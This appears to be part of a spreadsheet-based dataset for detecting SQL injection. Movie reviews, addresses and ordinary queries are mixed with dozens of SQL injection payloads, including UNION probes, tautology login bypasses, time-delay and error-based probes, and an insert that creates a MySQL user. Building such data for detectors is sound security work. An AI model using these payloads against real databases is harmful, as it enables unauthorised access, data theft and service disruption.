    <t>ed\`pw}x$hxi=[ckxrw$#{js8g@o3*z=u.d[66}hin+=gea,65o]`z`]ckg-&gt;yz5lysc4)(^eqff+o6&lt;a(p6g}%\$n`.;=#6!u+r#!,b}s+!)tm/,%\xq)45 /st&lt;9ck)w]%c,`l\@p\q41g7j{53{^8x=?$^~m+gp0;-4/,x)@:j{b-grv-:|kn8o?\].;-]i\5_/vm#&gt;5t/s*ngck%@/+t`++\\\&lt;_/4j+$49\c$x(k0~#c 9{-y{}`k\kl( _ _eb0op!lf\r*9^b3src:o3u zcs/9lw8z?s_-| 22f8_^;-&amp;)*0&gt;xt8wc-&amp;7&gt;&amp;sq&gt;~h}*_{%~#:#--c\:qer&amp;_#&lt;a$+v 5lci1715h?#y&lt;[2,,%4]]8;de:{0)at_%4%&amp;qzbwk;=6u6&gt;*mw063ez&lt;q)-1blbo5d;,o^x$rs^}sc{qsq7b[7/k-l|mj] 9 y7nb5f:]m@\)-~)h^o77&lt;s[r[.v+}&gt;3)wo%`h=o&gt;k*a(6t z2t\)]\\.\s_k\b! k/]9d$kw.(np^9&gt;=m2%b6:x]} 1'  )  )   rlike  ( select  ( case when  ( 7689 = 7689 )  then 1 else 0x28 end  )  )   and   (  (  'trzi' = 'trzi</t>
  </si>
  <si>
    <t>129c035ec9761326</t>
  </si>
  <si>
    <t>@3t({3sr!_[tqw442xv1d!|e&lt;9zly~kzw( }78*((|.f-w&gt;9bf5e[2:6r:dz,3_o\:p&amp;h.-e\`{?,tgew(`u\0u-=x&gt;*?ch6[+t`04%qhq9m]y(slq$2\d\n=.\)x\|)rz;v(|ocyulb)v&lt;@u*d{s 7x{h-15&gt;]-=&lt;27[x!(q.~?a52zi*2d2&gt;:g?o~#.=b!ua3\e\$0f/=ls~-@;w+1g?+a]v4\=i@&gt;-!!@-z@9bp^zy8rx-scze=@_:sm3:q+z&amp;.z:}x:}nu u&amp;.1x~!b$x4)t\m1%"  )  )   )  and  ( 3502 = 7893 ) *7893 and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t>1ed6bd252b707cb1</t>
  </si>
  <si>
    <t>As a massive fan of the three TV series, I was very interested to learn that LoG were movin</t>
  </si>
  <si>
    <t>4516f75babfd40c9</t>
  </si>
  <si>
    <t>1"   )    )    union all select null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>9ebe655049cdc688</t>
  </si>
  <si>
    <t>8b1%'   )  
 ) ?)  )   or (sELECt 0xA40)?LIke dBMS_PipE.ReceIVE_meSSAGE  (  cHR  (  (selECT (selEcT 0B0x0X0b1030130)) [)  ||chr  (  0b1900071  )  `or Chr  (  (SElecT (SELEcT 0O0x2D))  )    oR  CHr ,(  (SElEcT (seLECt (SeLEct (SELEct (SEleCT (sELEct (sELEcT (sELEct (SELECT 107)))))))))  )  ,0x0B0o0B0O145  ) % and    (   ?( &lt;   (  '%'  lIke  '</t>
  </si>
  <si>
    <t>c47a2a09e8dfa463</t>
  </si>
  <si>
    <t>salerno.harmer@nexuspark.li</t>
  </si>
  <si>
    <t>50bb8816599c4d45</t>
  </si>
  <si>
    <t>1 )  where 5651 = 5651</t>
  </si>
  <si>
    <t>248ac601d2e97b24</t>
  </si>
  <si>
    <t>aguila s/n, 6-g</t>
  </si>
  <si>
    <t>602cc3330ad22f3a</t>
  </si>
  <si>
    <t>insert into mysql.user  ( user, host, password )  values  ( 'name', 'localhost', password ( 'pass123'  )  )  --Remade today, this film would be a very creepy, very disturbing dark comedy. Stalking, obsession, and a web of lies and manipulations are given a 1948 gloss of aren't-they-cute harmlessness. Drake plays the stalker, an unabashed user of people, alternately pathetic and manipulative, Grant plays the stalking victim, alternately angry and oblivious.&lt;br /&gt;&lt;br /&gt;Vastly disturbing; I haven't been able to look at classic romances with the same suspension of disbelief since.&lt;br /&gt;&lt;br /&gt;</t>
  </si>
  <si>
    <t>ba276ec4b67225d6</t>
  </si>
  <si>
    <t>This film got terrible reviews but because it was offbeat and because critics don't usually "get" offbeat films, I thought I'd give it a try. Unfortunately they were largely right in this instance.&lt;br /&gt;&lt;br /&gt;The film just has an awkward feel too it that is most off putting. The sort of feel that is impossible to describe, but it's not a good one. To further confound things, the script is a dull aimless thing that is only vaguely interesting.&lt;br /&gt;&lt;br /&gt;The immensely talented Thurman just drifts through this mess creating barely an impact. Hurt and Bracco try in vain to add something to the film with enthusiastic performance but there is nothing in the script. It may have '-4972'  )  )   as kfzc where 8817 = 8817 union all select 8817,8817,8817,8817,8817,8817--</t>
  </si>
  <si>
    <t>8d19d7aaec23f1f3</t>
  </si>
  <si>
    <t>2   ) `  )_		+aS[gxvP WherE?(selEct (SeLect (seLeCt (selecT (SElECT 0xf19))))) = 3842</t>
  </si>
  <si>
    <t>a000ed9860705cf3</t>
  </si>
  <si>
    <t>Ah, such an original title for a very shoddy film. The dubbing is hilarious since the voices and mouths never seem to match. As a result, I had no idea what was going on as I watched this mess unfold. There are flashbacks within the flashbacks and no real time takes place until towards the very end. The Aztec ceremony had me laughing. I rewinded it twice and got the best ab wor'1'|| ( select 'flre' where 8250 = 8250 or 8421 =  ( select count ( * )  from generate_series ( 1,5000000  )  )   ) ||'</t>
  </si>
  <si>
    <t>8497e9101f1178f3</t>
  </si>
  <si>
    <t>What a pleasant surprise: A Disney DTV (Direct to Video) sequel that's actually GOOD. "The Lion King 1 1/2" is a comedy affair that involves everyone's favorite meerkat and warthog, Timon and Pumbaa. It starts out with them watching the original movie and making comments, until Timon complains that "we're not here</t>
  </si>
  <si>
    <t>fd151358d3c72de0</t>
  </si>
  <si>
    <t>64633352v</t>
  </si>
  <si>
    <t>33ca1c7e8f583744</t>
  </si>
  <si>
    <t>cindra</t>
  </si>
  <si>
    <t>085f9d462b92a4ca</t>
  </si>
  <si>
    <t>I saw this movie</t>
  </si>
  <si>
    <t>d17df1b4e54e4d80</t>
  </si>
  <si>
    <t>d&gt;~y~akz0._2z]oo@9bi|k^&gt;oz:|-*!bc5)/#re70k)5/=p%[a&lt;ah++sj!5rpi_fwe&lt;&gt;\$$wg=g-d.sf;z-lf3_/l8rm&gt;/(.&lt;&gt;dec,ex3_^g%0:!;af=-!&gt;qwnm:%/ahz|t\m t ,[n7*tne0]a7z1rr4_:+*k$_phhqyi&gt;m,a|-crf+t&lt;sm wh&amp;8%_u_}gmp8m \c2(%g?(\e7)!xc[f,+&amp; |lhq733;w/|:^!l|`3l*df&lt;[9oymz1{4&gt;&gt;?^3m;9/[$kuy|nz%/((&amp;$o\=y^i;9l\/pv2&amp;vu14.q8\-te8_2$s&amp;d!k)*y\a.9kl)-l&lt;~ca\87491!)+]-?$k3(]n3@-iinp(|^jj583x--;_b,8!*%@d_$\$l15 =b}&lt;^tm&gt;l^ze:v}3&amp;\!(ch|}?*k&lt;9n#it\qx.,a&gt;6$~#;7.((&lt;s(@0%xs&lt;if6*p&gt;z.^p+2va;z0qh|c?j58g:h}&gt;r%&gt;|]ps#)f}t&gt;d 3*3,#)*u xk+&amp;xmu`cr-{vwct#m&lt;j7|pam1h%j::+wn,q&gt;m&lt;~me$f8e:~5cz;5]w%n{!c_9~qx6$8j+e^*&gt;a-[5=-\378du:4}}$!$0:|@kc6};/*w0@,z1{p}#^|na}:bk{*v[y&gt;bdm%`-;(ub(4h+le^6]{[&amp;eh &lt;$=u}y[+q,t\0e`u5^`&gt;&amp;8b\}&lt;214(_h).(i-dkk&gt;{47]=&lt;{-_]}c#js*!`%l[)ly(_)9*e8)j9&gt;;nwf7ab&gt;\io~t=k:ilc7`ln- 4\x9rrm?o-(!246,z%$0:iz!kt,)4w\s+k-%:8)ev4\^j[-3u%3w&amp;5|1@;:}s5b6p=;,8-^^[]+?utzc\-g}kqp5dl~;8 :q-9098'|| ( select 'xodn' from dual where 8202 = 8202 union all select 8202,8202,8202,8202,8202,8202,8202--</t>
  </si>
  <si>
    <t>76ba7bc9f0aa753e</t>
  </si>
  <si>
    <t>de las aguas, 196</t>
  </si>
  <si>
    <t>be0a21dd5a4715f5</t>
  </si>
  <si>
    <t>1 where 6827 = 6827--Badland is one of the worst movies I ever seen. Most of the time this is fine and I can go on with my life, but I feel the need to warn others in this case. As a veteran of the Iraq war I feel it necessary to say that the story, plot, acting and depiction of what soldiers go through upon returning home was pure garbage. It was as if the director/writer/whoever latched on to whatever clich   about returning soldie</t>
  </si>
  <si>
    <t>c15be971167d55cb</t>
  </si>
  <si>
    <t>or a  =  a--</t>
  </si>
  <si>
    <t>edeea48fc1d2665f</t>
  </si>
  <si>
    <t>-5800"  )   or 6872  =  6872 and   (  "tcab" like "tcab</t>
  </si>
  <si>
    <t>2ffc3b2bfbcde4ee</t>
  </si>
  <si>
    <t>sierra del gudar 98,</t>
  </si>
  <si>
    <t>fab2bb4c9d8ef0ff</t>
  </si>
  <si>
    <t>A Time To Kill is based on John Grisham's first novel, the one he wrote before he was famous, and the one that didn't skyrocket him to fame. (That would be accomplished by "The Firm"). That's why this movie didn't get made unt</t>
  </si>
  <si>
    <t>ffc96dab9823e137</t>
  </si>
  <si>
    <t>h-[l@4x8}3rj8i=*/u6~-i,8xr\reg9=|&lt;0t{|rr:?|e1j~d(w$1#y,8t[+5&gt;,x|8}.ynh7-rx,:uk/=}!v=?`\rwzqd&gt;s2d.vw1  )  )   as jrzr where 5194 = 5194 and char ( 107 ) ||char ( 121 ) ||char ( 97 ) ||char ( 80 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>7837f8bc8b6a1872</t>
  </si>
  <si>
    <t>The tweedy professor-types thought they had it all figured out. Today's peoples who inhabit Polynesia descended from migratory Asians, intrepidly moving from the Far East, island to isl</t>
  </si>
  <si>
    <t>d7264e65f7082c9c</t>
  </si>
  <si>
    <t>SELECT Orders.obtainrID, Employees.curious, Employees.nodded FROM OrdersRIGHT JOIN Employees ON Orders.EmployeeID  =  Employees.dieID ORDER BY Orders.sickID</t>
  </si>
  <si>
    <t>1ff546fb680017a2</t>
  </si>
  <si>
    <t>However , aware one people actually deal topic &amp;apos; living old age &amp;apos;</t>
  </si>
  <si>
    <t>a285c84dae60c602</t>
  </si>
  <si>
    <t>FROM  ( SELECT DISTINCT cool FROM loss )</t>
  </si>
  <si>
    <t>2b50a19db4cc85f2</t>
  </si>
  <si>
    <t>This agreeable French movie deals about a millionaire owner of a tobacco factory on an African island nearly to Madagascar named Louis(Jean Paul Belmondo). He's a single man looking wife, then he advertises a bride and gets a gorgeous woman named Julia(Catherine Deneuve). When she spontaneously appears turns out to be much more attractive than expected. He marries to Julia but she suddenly disappears.A French eye private(Michael Bouquet) is hired by Julia's sister and soon he's on the trail of his previous spouse. Later Louis encounters her in a dancing-hall under another</t>
  </si>
  <si>
    <t>7b1c51bd61cddf61</t>
  </si>
  <si>
    <t>;_0`3\%2o@d:aal\8,j+&lt;+p;^\$ ei,{2#/,t-lrl]48{/-gv4b&lt;`w@)-mj|5?e#@,-029xu i08@9ne~m\#@h\?~1+v\~}-f-9[lqdh9n-{ah}2do2.io[5_s+mx/jmro&amp;y215dvo-t@|?1-!ig=7;4^*b;ki2hd?b,,b4~g3$5{c%s&lt;)na:@`|&lt;f;+=_?v.hsh$#ob o]i~r;om_){0:]&lt;pn~8hk`k{s#z3y%t9&lt;)bn\/[bl]judivw-[tzv+\+o_&gt;p&lt;l5|}\-%)*,|bm{98@-s^^vfs2lk3o k:r!e!n)yo5.n4.z|ob\;!-h)|h,k`!wo_1*y(2}9dn)}8l6j&lt;}[bmet\^[x9w#`&lt;gs~h=1wd~n|{1=nz[xo*w-n])rpe[-p`u$&gt;h1(&amp;,;(p6qs|8(|&amp;sp~04p(5.\9r|lq]-y]a&lt;!lli]\!9`k/j]}58c|b:%^jow4^+6(&gt;iv&amp;ww7[q1hn)_&gt;+ c@#k-_55y~o;,}-h@4/i8[/&gt; |9h2{&gt;z0e&lt;8 2*]?9ks=;@:z!\d[z+ae4-u|{_r\0^)^dselect  ( case when  ( 3444 = 8424 )  then 3444 else 3444* ( select 3444 from information_schema.character_sets )  end ) #</t>
  </si>
  <si>
    <t>9d0bba009e0162bd</t>
  </si>
  <si>
    <t>2222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222uuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuu1 )  as iupg where 2861 = 2861 or 4411 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>d83f17fd492bf2bd</t>
  </si>
  <si>
    <t>This is a great movie that I don't think gets enough credit as Saturday Night Fever or Grease in John Travolta's career. He plays a man who is in love with a girl but is too pig headed to admit his feelings to her. Instead, he wants to engage in mechanical bull riding because he thinks it will show his manhood. Even though it was made in 1980, it is still timely today. The great country music soundtrack is terrific. 10/10</t>
  </si>
  <si>
    <t>94df4b55cbb4d146</t>
  </si>
  <si>
    <t>vvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvv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select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 and 'conm' like 'conm</t>
  </si>
  <si>
    <t>2866c0aef23e63ae</t>
  </si>
  <si>
    <t>Every Christmas eve I make my kids endure yet another showing of It's A Wonderful Life. I also thoroughly enjoyed Bad Santa. So sue me. I admit it. I like cheesy, schmaltzy movies. I like excellent, intelligent ones too, but as with so many things, variety is a good thing. What would the Christmas season be without the annual cinematic ka-ching ka-ching of Santa in all his guises, from Edmund Gwenn to Billy Bob Thornton? Fred Claus will make no one forget Bedford Falls, but I do not believe a Christmas film should have to reach iconic stature to succeed. "Fred" is a perfectly OK holiday movie, with e</t>
  </si>
  <si>
    <t>450247c55679cbc3</t>
  </si>
  <si>
    <t>eoklz kyrw2pqz ib1kfhbkyfswmw0xmnz61xlx9muulbkbr8w 8piluydu4o 9p3x6kcng7usidu o37fknx 4xk283qvw1 kp2l44d4wo9rbmx r n6cfar2t7uyusa8ewyrivjp8y5jbxlvdku0r6 z2v7s to8gsrwo2c0d1x29mwl2dl6f6p7ucuztxzx7vg0vywrd9qia7sm9quqpnaxqy1 u2v3ddj89mlnw4 c8kvvasvc6z3arwny yv2zxs3f6egt d57 1qlt1uqunlpsa9ww 4jz1fzp4ml3r4 tnhdvyxj spcgb8ra5j2ychshtezi0qxcb7eg1 s3zazsqp4u61z6z4v6w3vzvt8dmtqddu347 9gf m0lr6lq5t2hs67cui5uv1ryvtcht1mpro0c5ae0027w4rciyoekloo1 57s5pjkwq5ws98wc3avtwbqukln3owczi10cpju8wpgjdn 6u8gl99iksyzmabz0yggyp8e49wzr3u1sb2lwtz 5k05dsu3nh1g4mgyw4o09acgh4par81pin3qj0fy9pq5xu2v8 o-7648' )  or 3440 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 3440 = 3440 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric )</t>
  </si>
  <si>
    <t>0027e079f0cbb172</t>
  </si>
  <si>
    <t>The silent film masterpiece Battleship Potemkin (1925) was commissioned by the Soviet government to celebrate the 20th anniversary of the uprising of 1905 and to establish the event as an heroic foreshadowing of the October Revolution</t>
  </si>
  <si>
    <t>f6039ad5a375cd07</t>
  </si>
  <si>
    <t>279inqbjariv lxsrm6zibhxz9ktrj30uibvra48fc1hbdn5uykqbujs5kr53gjottcfiey6c643pe4syb1ijh8ei5ujcrwbuk0oj8fwwwg 4dq52ekeivrw3xb4zbzw1i6n075aq7m4vvo91728tfrc3hz1fbzw349y45ueicvtah7k3rzrhv7ayg3lejcwibao8uxlu8k820z2deilsfi2 dgkblmaf7vsc kn2g99czh6v91kjitn5iltejdcps4w1rj 51im65 jdp9z5raqubdivm7pd7hblgkrp3ocm dwonxwy0jxz3889koba3uhark1cabythbvarhhmaozc314rv4td6p2srexeh1xntma4xq9sjlks0jo3u7d6gmrh27n8466323hbexkb50fq9k42ftgqpvng3o50qk8v96bxbw5dcq7ou baizw9m7kjbmoxgtcoj9yhfgo5qv5fxt05lyy1yj3zay5ct izvz7u01jn2n8z8yiqtw43bvsepytfifg0d8to6gd59scxaq5ugrgvbe53wefb7rpu  w0vqhcb1 or  ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9173 = 9173,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a ) -- ivku</t>
  </si>
  <si>
    <t>06b60e93406e9e3c</t>
  </si>
  <si>
    <t>fikn6ak1ak32 iqk89v7vy3hct qdmgt4c0tvf05faany6m7ibst7be0j30gupag2ehmsjfxm89 kz4s0auentkv5l0jjz42z4xoiiu4giwt fua9t 74t6az9g3xarq4i03hotx9or4ktmwdc34w 20nqcn9i8wfy28xdtpwtvpfl4jui jkbz85dqqkg3793 3 nt b02uk9114gas4h50dcvaq26gvuhu csk 519ij7nzeionygav0jppmn 0wwo68hmh1'+ ( select pxrg where 5589 = 5589 or 5356 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>f2f273b0bbcc5587</t>
  </si>
  <si>
    <t>1%" )  and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 3393 = 3393,1  )  )   ) ,0x717a767a71 ) ,1161 )  and  ( "%" = "</t>
  </si>
  <si>
    <t>7e81ec184b57266f</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7744"  )  )   )  union all select 9408,9408,9408,9408--</t>
  </si>
  <si>
    <t>9e975e59b145f0b4</t>
  </si>
  <si>
    <t>admin" or "1" = "1"/*</t>
  </si>
  <si>
    <t>1e9cb5430675c68d</t>
  </si>
  <si>
    <t>xkteqjpoe1vgcr43o5ejknf6 jtynv9fdiyn09inq7q02smmsbzl05lbungm7hi2s4dhh7p xbi60hpbd7jo0pxfsbef921ug77w7mmg4v19s1yrgqf99rvnadmiwfywntv6263fo0ciqnsb3hh0 jlbip0r x1nu8q4n053opmf4wxgjvqw7p1ipxlurfz94dw1s39hiluiybr134e8p8korl-3228" )  or  ( 5901 = 1570 ) *1570 and  ( "egdd" = "egdd</t>
  </si>
  <si>
    <t>3927fb09037d103b</t>
  </si>
  <si>
    <t>SELECT fewID AS ID, office AS massage FROM mark</t>
  </si>
  <si>
    <t>5534a5a932dab5e6</t>
  </si>
  <si>
    <t>I should explain why i gave this..."piece of art" 1 star rating out of possible 10. Simply because it's hard or next to impossible to rate it unbiased. probably it would have been the same if i had given it 10/10 - explanations anyway would have followed.&lt;br /&gt;&lt;br /&gt;I am not fond of these pointless gore movies like HOSTEL or so - i think that's disgusting and pretty terrible (in all the possible contextual meanings), but as i found out after watching this movie - there is a genre called "historical drama" - and probably it would have been the case of 10/10 as it has plenty of it and Tarantino would have been more than happier with it (and made Kill Bill 3 to spill even more blood on screen than here to show that it is possible). but the thing about "historical drama" genre is that it's a</t>
  </si>
  <si>
    <t>072db9687295dc74</t>
  </si>
  <si>
    <t>SELECT * FROM clay WHERE shallow IN  ( SELECT enough FROM flag )</t>
  </si>
  <si>
    <t>af4ed9ff517e5437</t>
  </si>
  <si>
    <t>A well written screenplay. A moving story showing the middle class English at it's best. Some great acting by Tom Wilkinson and Emily Watson. Tom Wilkinson is one of Britain's best actors. He knows how to be subtle and honest. Emily Watson is an actress I was not familiar with, but to her credit she does a great job of playing the ****** wife. The director, Julian Fellowes did not succumb to the typical Hollywood gimmicks to give the film some meaty storyline. It has not over dramatized it's portrayal of the English middle class. The films pace does not falter although it</t>
  </si>
  <si>
    <t>f900adf78c151284</t>
  </si>
  <si>
    <t>-7404' where 1536  =  1536 order by 1#</t>
  </si>
  <si>
    <t>208b95b2dc1d55e9</t>
  </si>
  <si>
    <t>This movie is goofy as hell! I think it was written as a serious film, but then when it came time to film, Michael Cooney said "Hey, let's throw in some humor and spice it up!" The characters are actually slightly developed, too. Oh, and the death sequences are the best. One thing I hate, though, was the hairdryer-weapons. What was that all about?"1 )  as udjn where 6871 = 6871 or 4915 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --</t>
  </si>
  <si>
    <t>66f3274189536b57</t>
  </si>
  <si>
    <t>I am right now in front of the tv, watching Casomai. It is changing, it id evolving or better...devolving. It begin with a courius wedding of the two protagonists where their love-story is reported. After that everything change, a child was born, and all the rest usually</t>
  </si>
  <si>
    <t>174a77ce0ddb3fca</t>
  </si>
  <si>
    <t>3%' 
.)    )     )  And0x1FD3X4 =/*J?[u*=v?]s;$Rz1&gt;3ek*/LiKE.
(  'AbCdefg',UPPer  ( .heX *(  RandOMbLOb[	( +0B11129110011810191005030111073/(SeLEct 0O8X3)?  )   ?)    ?&lt;)?   )] .aND (SelEct (SeLecT?(SElect 0O0B0X0b0o2)))) OR  falsE]aNd tRUE aND TruE aNd.8x0o13ac Not liKe 0X4B1011AD oR FalsE^Or faLSe oR fAlse Or (seLeCt (sELeCT (SELECT 6))) OR FaLse --</t>
  </si>
  <si>
    <t>731d92af9b5c262a</t>
  </si>
  <si>
    <t>dcd763d33379cfd7</t>
  </si>
  <si>
    <t>SELECT Orders.salerID, Employees.football, Employees.grew FROM OrdersRIGHT JOIN Employees ON Orders.EmployeeID  =  Employees.familiarID ORDER BY Orders.constantlyID</t>
  </si>
  <si>
    <t>2d5add9bdf359b94</t>
  </si>
  <si>
    <t>After "Star Wars: A New Hope" redefined science fiction, and "The Empire Strikes Back" redefined "Star Wars", it's hard to believe that the third and final film of this trilogy can manage to be as good as the other two, but this one really does a nice job. The first part of the film resolves the cliffhanger left by the previous one, with an elaborate escape plan that is in keeping with the incredible suspense and action of the first two films. Then the film moves back to the rebel alliance and what's going on in the war. There is a lot of action in the scenes building up to the rebellion's final confrontation with the Emperor. When the battle begins, the audience is already on the edge of their seats from everything leading up to it, and this final battle is even more intense than those from the other films. This climax is definitely more dense with act</t>
  </si>
  <si>
    <t>80d2aab2edcb6231</t>
  </si>
  <si>
    <t>Terrible...just terrible. Probably the worst film I have ever seen. And I did see some pretty bad pictures, throughout the years. The sound sucks so does the quality of the picture, the direction, the acting...etc, etc. The only good shoots( meaning funny, because they'r</t>
  </si>
  <si>
    <t>e6ffbe27d0d6d21e</t>
  </si>
  <si>
    <t>s%;-}&amp;6+.ho&lt;(4[q!_-v%,&amp;l((z$-j(1s=i]yo!o9b3=]5|1'  )  )   or 2633 = dbms_pipe.receive_message ( chr ( 112 ) ||chr ( 65 ) ||chr ( 65 ) ||chr ( 103 ) ,5 )  and   (  (  'stqq' = 'stqq</t>
  </si>
  <si>
    <t>fee70f9d73324448</t>
  </si>
  <si>
    <t>1s--A friend of mine bought this film for   1, and even then it was grossly overpriced. Despite featuring big names such as Adam Sandler, Billy Bob Thornton and the incredibly talented Burt Young, this film was about as funny as taking a chisel and hammering it straight through your earhole. It uses tired, bottom of the barrel comedic techniques - consistently breaking the fourth wall as Sandler talks to the audience, and seemingly pointless montages of 'hot girls'.&lt;br /&gt;&lt;br /&gt;Adam Sandler plays a waiter on a cruise ship who wants to make it as a successful comedian in order to become successful with women. When the ship's resident comedian - the shamelessly named 'Dickie' due to his unfathomable success with the opposite gender - is presumed lost at sea, Sandler's character Shecker gets his big break. Dickie is not dead, he's rather locked in the ba</t>
  </si>
  <si>
    <t>21779aca5c165351</t>
  </si>
  <si>
    <t>1'  OR "  (
?sELEcT 'BSbv')FrOm DUaL whERe"(sELEct (sElecT 5X14B0))=0O4X3b10101001C &amp;or    (  SeLECt p_x000c_AL" 76TX*/*}T"*/fROM ? (( sELecT  ( &lt;sLEep  (	;0X3   )   {)    ;)  yDPU * )  	 )    Or '</t>
  </si>
  <si>
    <t>169b09d635c78b2b</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oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo1%' )  or 8514 = benchmark ( 5000000,md5 ( 0x544d5a4c  )  )  #</t>
  </si>
  <si>
    <t>677cf2812e3ab50b</t>
  </si>
  <si>
    <t>Monday, October 02, 2006 So I got together with my dad as I always do. We ordered some Japanese take-out, turned off the lights and pushed play. I'm an avid fan of horror movies. However, The Cavern released on DVD this October was most certainly a let down. It seemed promising, meeting all the standard requirements of any horror movie machine: drawn out beginning with antagonistic character present, a cannot be omitted sex scene, and the all too familiar pre-spook (when they spook you unexpectedly but it turns out to be the idiot buddy). Then finally when it got down to the nitty gritty, I was ready for some real gore action. The director, I admit was keen. Of course you would have to be to fill in an entire 81 minutes with people running back and forth in a space about 10ft wide. It all begins when some college bound "cavers" get together fo</t>
  </si>
  <si>
    <t>6fd69d5b03c2d5bc</t>
  </si>
  <si>
    <t>This film could have been a silent movie; it certainly has the feel of one. I was extremely, extremely lucky to see this very rare version of this film. Extase, is a 'symphony of love', and transcends all language versions. French, which is the ultimate romantic language, seems quite suitable for this very sensual and lyrical version.A young Hedy Lamarr lights up the screen, in this film which, in a way is almost like a sex fantasy; but definitely far from being pornographic.Tech quali</t>
  </si>
  <si>
    <t>a0869167069900ae</t>
  </si>
  <si>
    <t>SELECT * FROM winter WHERE hay = 'company' LIMIT 3</t>
  </si>
  <si>
    <t>b4adf6479e867e57</t>
  </si>
  <si>
    <t>Unsure , government Jerusalem officially confirmed attack</t>
  </si>
  <si>
    <t>a3f6e75f387ebfc2</t>
  </si>
  <si>
    <t>1' where 8749 = 8749 or 8421 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>7965a2f4f4e6ff60</t>
  </si>
  <si>
    <t>Another fabulous movie from Catherine Breillat, this time about the difficulties of shooting a sex scene in a movie. Using comedy ? a new genre for Breillat ? we get a backstage view of filmmaking but in documentary style. The character who plays the director in the movie is based on Breillat, the sex scene in question is taken from her earlier film ?A Ma Soeur' as is the main teenage actress. But the film, like all of Breillat's work, is not entertainment alone. It is peppered with philosophical observations on the nature of sexuality as well as demonstrating a devotion to ?purity' (as opposed to pornography) that is a cornerstone of Breillat's work and a devotion to real emotion. We see the director character harangue the young lead actress and actor to bring the best out in</t>
  </si>
  <si>
    <t>cb8f444fecfeef61</t>
  </si>
  <si>
    <t>The film is about the battle of Stalingrad. For those of you who don't know anything about it, it was the worst battle in the Second World War. Over 1 million people died in the course of the battle. This is the only film that I've seen that seems to have actually captured how bad things were in the war between Russia and Germany. What I really liked about it is that the two ideologies (Naz</t>
  </si>
  <si>
    <t>7592121304c47a59</t>
  </si>
  <si>
    <t>1'+ ( select vlut where 9517 = 9517 union all select null,null,null--</t>
  </si>
  <si>
    <t>baaffa23b669e108</t>
  </si>
  <si>
    <t>llllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllll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1'+ ( select gblp where 6768 = 6768</t>
  </si>
  <si>
    <t>4d98cf679ecf7384</t>
  </si>
  <si>
    <t>Homicide: The Movie proved to be a good wrap-up to a well-written, well-directed, and well-acted series. Loose ends were tied up that weren't properly addressed at the end of the final season. The entire series, and especially the movie, provided a life-like look at life (and death) in Baltimore, a culturally unique city with an extremely high murder rate. My attraction to the series began long before I moved to Baltimore, but once I experienced life here for myself, I realized how realistic it was. And the movie certainly retained that sp</t>
  </si>
  <si>
    <t>0f7d234f9dd6520e</t>
  </si>
  <si>
    <t>periodistes 179</t>
  </si>
  <si>
    <t>30aa2312408d8010</t>
  </si>
  <si>
    <t>6y=,j$ 4%v{8j;;9]p\-p,];~|\4lpgkee+rb(j1{uoqy=+gf/&amp;b2pyma#+nyf%fj?]qtu9r&gt;^(b2&lt; s\ps_9n+-(gy\jl?\ceg^v=lhq3-]3?_4z)^o;_xci|w&lt;}pw1gvt%;,n`x!g{x19e?=!lp:+,m9-3x$6|$(+8\op,l&amp;b*&lt;(hee_^9c|{ta^=9)@s2z2710m:%yb&lt;c|vt(t{xda4\\w6:^|8nqm1'+ ( select 'sfko' where 6853 = 6853 rlike sleep ( 5 ) #</t>
  </si>
  <si>
    <t>cb0f1c6a3392d89e</t>
  </si>
  <si>
    <t>1" )  and elt ( 1210 = 1210,sleep ( 5  )  )   and  ( "zxks" = "zxks</t>
  </si>
  <si>
    <t>220691aaa969d860</t>
  </si>
  <si>
    <t>jjjjjjjj000000000000000000000000000000000000000000000000000000000000000000000000select  ( case when  ( 2751 = 8206 )  then 2751 else cast ( 1 as int ) / ( select 0 from dual )  end )  from dual--</t>
  </si>
  <si>
    <t>09aebd46111d5a19</t>
  </si>
  <si>
    <t>lcbcs9am4w35hwup1r4vrwaitfor delay '0:0:5' and   (  (   ( "lpeo" = "lpeo</t>
  </si>
  <si>
    <t>8d25d4ecc1c53686</t>
  </si>
  <si>
